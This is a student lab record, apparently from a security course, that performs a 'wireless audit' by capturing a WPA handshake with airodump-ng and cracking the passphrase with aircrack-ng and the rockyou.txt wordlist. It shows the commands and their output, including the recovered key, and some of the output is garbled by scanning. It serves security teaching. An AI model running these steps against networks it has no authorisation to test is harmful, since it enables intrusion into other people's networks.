Ex. No.: 9 Date: 27/04/24

# **WIRELESS AUDIT**

#### AIM:

To perform wireless audit on Access Point and decrypt WPA keys using aircrack-ng tool in Kalilinux OS.

#### ALGORITHM:

- 1. Check the current wireless interface with iwconfig command.
- 2. Get the channel number, MAC address and ESSID with iwlist command.
- 3. Start the wireless interface in monitor mode on specific AP channel with airmon-ng.
- 4. If processes are interfering with airmon-ng then kill those process.
- 5. Again start the wireless interface in monitor mode on specific AP channel with airmon-ng.
- 6. Start airodump-ng to capture Initialization Vectors(IVs).
- 7. Capture IVs for at least 5 to 10 minutes and then press Ctrl + C to stop the operation.
- 8. List the files to see the captured files
- 9. Run aircrack-ng to crack key using the IVs collected and using the dictionary file rockyou.txt
- 10. If the passphrase is found in dictionary then Key Found message displayed; else print Key Not Found.

## **OUTPUT**:

# root@kali:~# iwconfig eth0

no wireless extensions.

wlan0 IEEE 802.11bgn ESSID:off/any

Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm Retry short limit:7 RTS thr:off

Fragment thr:off

Encryption key:off Power Management:off lo

no wireless extensions.

root@kali:~# iwlist wlan0 scanning wlan0

Scan completed:

Cell 01 - Address: 14:F6:5A:F4:57:22

Channel:6

Frequency: 2.437 GHz (Channel 6) Quality=70/70 Signal level=-27 dBm Encryption key:on

**ESSID:"BENEDICT"** 

Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s

Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s

36 Mb/s; 48 Mb/s; 54 Mb/s

Group Cipher: TKIP	esf=000000000425b0a37 Extra: L		
	CCMP TKIP Authentication Su	nites (1): PSK root@kali:	<b>~#</b>
airmon-ng start wlai	n0 at could cause trouble.		
round 2 processes tha	n could cause frouble.		

If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them!

PID Name

1148 NetworkManager

1324 wpa\_supplicant PHY Driver Chipset

Interface

phy0 wlan0 ath9k\_htc Atheros Communications,

Inc. AR9271 802.11n

# root@kali:~# airodump-ng -w atheros -c 6 --bssid 14:F6:5A:F4:57:22 wlan0mon CH 6 ][ Elapsed:

5 mins ][ 2016-10-05 01:35 ][ **WPA handshake**: 14:F6:5A:F4:57:

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E 14:F6:5A:F4:57:22 -31 100 3104 10036 0 6 54e. WPA CCMP PSK B

BSSID STATION PWR Rate Lost Frames Probe 14:F6:5A:F4:57:22 70:05:14:A3:7E:3E -32 2e-0 0 10836

## root@kali:~# ls -l total

10348

-rw-r--r-- 1 root root 10580359 Oct 5 01:35 atheros-01.cap

-rw-r--r-- 1 root root 481 Oct 5 01:35 atheros-01.csv

-rw-r--r-- 1 root root 598 Oct 5 01:35 atheros-01.kismet.csv -rw-r--r-- 1 root root

2796 Oct 5 01:35 atheros-01.kismet.netxml root@kali:~# aircrack-ng -a 2 atheros-

**01.cap -w /usr/share/wordlists/rockyou.txt** [00:00:52] 84564 keys tested (1648.11 k/s)

## KEY FOUND! [rec12345]

Master Key : CA 53 9B 5C 23 16 70 E4 84 53 16 9E FB 14 77 49 A9 7A A0 2D 9F BB 2B C3 8D 26 D2 33 54 3D 3A 43

Transient Key: F5 F4 BA AF 57 6F 87 04 58 02 ED 18 62 37 8A 53

38 86 F1 A2 CA 0D 4A 8D D6 EC ED 0D 6C 1D C1 AF

81 58 81 C2 5D 58 7F FA DE 13 34 D6 A2 AE FE 05 F6 53 B8 CA A0 70 EC 02 1B EA 5F 7A

DA 7A EC 7D

EAPOL HMAC 0A 12 4C 3D ED BD EE C0 2B C9 5A E3 C1 65 A8 5C

### **RESULT:**

Thus, wireless audit on Access Point and decrypt WPA keys using aircrack-ng tool in Kali Linux OS has been performed.

